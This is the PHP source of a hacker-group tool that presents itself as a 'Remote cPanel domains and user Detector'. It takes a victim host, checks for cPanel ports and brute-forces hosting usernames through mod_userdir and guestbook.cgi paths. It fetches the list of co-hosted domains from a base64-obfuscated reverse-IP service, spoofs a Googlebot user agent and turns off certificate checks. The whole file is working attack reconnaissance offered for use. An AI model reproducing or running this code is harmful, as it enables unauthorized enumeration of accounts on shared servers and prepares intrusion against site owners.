<? session_start(); ?>
<style>
a:link {color:#FF0000; text-decoration:none;}
a:visited {color:#63C; text-decoration:none;}
a:hover {color:#669900; text-decoration:none;}
.ht{ background:#eae9e9; padding:20px; border-radius:20px; font-size:large}
</style>
<title> Hackteach Lovers Remote cPanel domains and user Detector </title>
<div align="center" class="ht">Hackteach Lovers Remote cPanel domains and user Detector <a href="https://www.facebook.com/groups/hackteach.org/">www.hackteach.org</a></div>
<?php
/*
Licence:
co[d]ed by Cold z3ro
FB : https://www.facebook.com/groups/hackteach.org/
homepage : www.hackteach.org
Description:
* this program has been founded for grep users for all sites located in
one server remotely so its not need to be in the same host
How to use:
* link the file with variable "h" with domain name or server ip
like the following cPanel.php?h=victemhost.com .
* some good stuff :
1. https://www.facebook.com/photo.php?fbid=867643286593184
2. https://www.facebook.com/photo.php?fbid=867643436593169
3. https://www.facebook.com/photo.php?fbid=867643459926500
*/
ini_set('xdebug.max_nesting_level', 10000000000000000);
ini_set('memory_limit', 1024 * 1024 * 1024);
ini_set("max_execution_time", "on");
function httpsPort($http)
{
$ports = array('2083','2087','2096');
$http = correctit($http);
foreach($ports as $key => $port)
{
if(iscPanel($http, $port, "port") == true)
{
$_SESSION['port'] = $port;
$_SESSION['http'] = $http;
echo "[+] cPanel server => Port:".$_SESSION['port']."<br>[+] checking some fetures..<br>"; break;
}else{
echo "ERR port:$port not reachable<br>";
}
}
if (!$_SESSION['port'] || !$_SESSION['http'])
{
die ('Not cPanel server !! <a href="https://www.facebook.com/m.z3ro">report bug to developer</a> if its realy cPanel server');
}
}
function zip($http, $svale, $evale)
{
@preg_match_all(';'.$svale.'(.*?)'.$evale.';is', $http, $zht);
if(count($zht[0]) ==0)
{
die("HTcore Error:\n\nCan't get server domains in this version\nBuy the full code version from devloper\nhttps://www.facebook.com/m.z3ro</textarea><form>");
}else{
foreach ($zht[0] as $key => $domain)
{
echo @preg_replace('/(Reverse.+?)+(Date)/i','',@strip_tags($domain)),"\n";
}
}
}
function htextra($htip)
{
// use only in the free version
$extract = base64_decode("aHR0cDovL3d3dy52aWV3ZG5zLmluZm8vcmV2ZXJzZWlwLz9ob3N0PQ==") .$htip. "&t=1";
$returndomains = zip(iscPanel($extract, "", "hostbydomains"), '</td></tr><tr><td>', '</td><td align="center">');
if($returndomains !="")
{
return $returndomains;
}
}
function iscPanel($http, $port, $type)
{
$curl = curl_init();# Create Curl Object
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);# Allow self-signed certs
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);# Allow certs that do not match the hostname
curl_setopt($curl, CURLOPT_HEADER,0);# Do not include header in output
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);# Return contents of transfer on curl_exec
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);#The number of seconds to wait while trying to connect. Use 0 to wait indefinitely.
curl_setopt($curl, CURLOPT_TIMEOUT, 30);#The maximum number of seconds to allow cURL functions to execute.
switch($type)
{
case "hostbydomains";
{
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
curl_setopt($curl, CURLOPT_URL, $http);
if (curl_exec($curl))
{
return curl_exec($curl);
}
}break;
case "zguestbook";
{
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
curl_setopt($curl, CURLOPT_URL, $http);
$execute = curl_exec($curl);
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($execute)
{
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if($code == "200" && preg_match("#".$port."#i",$execute))
{
return true;
}else{
return false;
}
}
}break;
case "zuserdir";
{
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
curl_setopt($curl, CURLOPT_URL, $http);
$execute = curl_exec($curl);
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($execute)
{
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if($code == "200" && !preg_match("#404 Not Found#i",$execute))
{
return true;
}else{
return false;
}
}
}break;
case "port";
{
curl_setopt($curl, CURLOPT_URL, "https://".$http.":".$port."/");
if (curl_exec($curl))
{
return true;
}
}break;
case "moduserdir";
{
curl_setopt($curl, CURLOPT_URL, "http://".$http."/~operator/");
if (curl_exec($curl))
{
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if($code == "403")
{
return true;
}else{
return false;
}
}
}break;
case "guestbook";
{
curl_setopt($curl, CURLOPT_URL, "http://".$http."/cgi-sys/guestbook.cgi");
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if (curl_exec($curl))
{
$code = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if($code == "200" && preg_match(";No Username given;i",curl_exec($curl)))
{
return true;
}else{
return false;
}
}
}break;
}
curl_close($curl);
}
function correctit($http)
{
if ((strpos(trim($http), "http://") === 0) || (strpos(trim($http), "https://") === 0))
{
return parse_url($http, PHP_URL_HOST);
}else{
return trim($http);
}
}
if(isset($_GET['h']))
{
$serverip = gethostbyname(correctit($_GET['h']));
if($serverip == trim($_SESSION['htip']))
{
if (isset($_POST['destroy']))
{
$pagedirectlink = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
unset($_SESSION['htip']);
unset($_SESSION['http']);
die ("<script> window.location='".$pagedirectlink."' </script>");
}
echo $_SESSION['http'] ." This domain has been used for checking ". $_SESSION['htip'] ." server<br>
Start over <form method='POST'><input type='submit' name='destroy' value='destroy'></form>
<br>Results:<br>";
print_r($_SESSION['result'][$serverip]);
exit;
}else{
unset($_SESSION['htip']);
unset($_SESSION['http']);
unset($_SESSION['port']);
}
httpsPort($_GET['h'])."<br>";
if($_SESSION['port'] && $_SESSION['http'])
{
if(iscPanel($_SESSION['http'], "", "moduserdir")== true)
{
echo "<br>[+] mod_userdir avalible <a href='?htc=userdir'>[ USE ]</a><br>";
}else{
echo "<br>[+] mod_userdir not avalible<br>";
}
if(iscPanel($_SESSION['http'], "", "guestbook")== true)
{
echo "[+] cPanel guestbook avalible <a href='?htc=guestbook'>[ USE ]</a>";
}else{
echo "<br>[+] cPanel guestbook not avalible<br>";
}
//gethostbyname($_SESSION['http']);
}else{
die("HTcore Error: server is not attackable");
}
}
$action = $_GET['htc'];
$_SESSION['htip'] = gethostbyname($_SESSION['http']);
$htip = $_SESSION['htip'];
$randArr = array();
switch($action)
{
case 'userdir':
{
echo "[+] Webserver : <a href='http://". $htip ."' target='_new'> ". $htip ." </a>";
echo "<br>[+] Attack type: mod_userdir <br><div align='center'><form method='POST'><textarea cols='50' rows='10' name='https' style='border: 1px dotted #000;' size='29' >";
if(empty($_POST['https']))
{
echo htextra($htip);
}else{
echo $_POST['https'];
}
echo"</textarea><br><input type='submit' name='zext'></form></div>";
if (isset($_POST['zext']))
{
if ($_POST['https'] =="")
{
die('Enter weblinks');
}
$s = '#9dc4d1';
foreach (explode("<br />",nl2br($_POST['https'])) as $weblink)
{
$https = correctit($weblink);
if(filter_var("http://".$https, FILTER_VALIDATE_URL))
{
$httpd = str_replace('-','',$https);
$users = explode('.',$httpd);
for ($i = 3; $i <= 8; $i++)
{
$htips = $htip;
$user = substr($users[0],0,$i);
$http = "http://".$htips."/~".$user."/";
if(iscPanel($http, "", "zuserdir")==true)
{
$result ="<div style='background:".$s."'>".$https .":". $user."</div>";
$randArr[] = $result;
$_SESSION['result'][$htip] =$randArr;
echo $result;
break;
}
}
}
$s = $s == '#eae9e9' ? '#9dc4d1' : '#eae9e9' ;
}
}
}
break;
///
case 'guestbook':
{
echo "[+] Webserver : <a href='http://". $htip ."' target='_new'> ". $htip ." </a>";
echo "<br>[+] Attack type: guestbook <br><div align='center'><form method='POST'><textarea cols='50' rows='10' name='https' style='border: 1px dotted #000;' size='29' >";
if(empty($_POST['https']))
{
echo htextra($htip);
}else{
echo $_POST['https'];
}
echo"</textarea><br><input type='submit' name='zext'></form></div>";
if (isset($_POST['zext']))
{
if ($_POST['https'] =="")
{
die('Enter weblinks');
}
$s = '#9dc4d1';
foreach (explode("<br />",nl2br($_POST['https'])) as $weblink)
{
$https = correctit($weblink);
if(filter_var("http://".$https, FILTER_VALIDATE_URL))
{
$httpd = str_replace('-','',$https);
$users = explode('.',$httpd);
for ($i = 3; $i <= 8; $i++)
{
$htips = $htip;
$user = substr($users[0],0,$i);
$http = "http://".$htips."/cgi-sys/guestbook.cgi?user=".$user;
if(iscPanel($http, $user, "zguestbook")==true)
{
$result ="<div style='background:".$s."'>".$https .":". $user."</div>";
$randArr[] = $result;
$_SESSION['result'][$htip] =$randArr;
echo $result;
break;
}
}
}
$s = $s == '#eae9e9' ? '#9dc4d1' : '#eae9e9' ;
}
}
}
break;
}
?>
<div align="center" style="padding:25px;">co[d]ed by Cold z3ro</div>
No comments: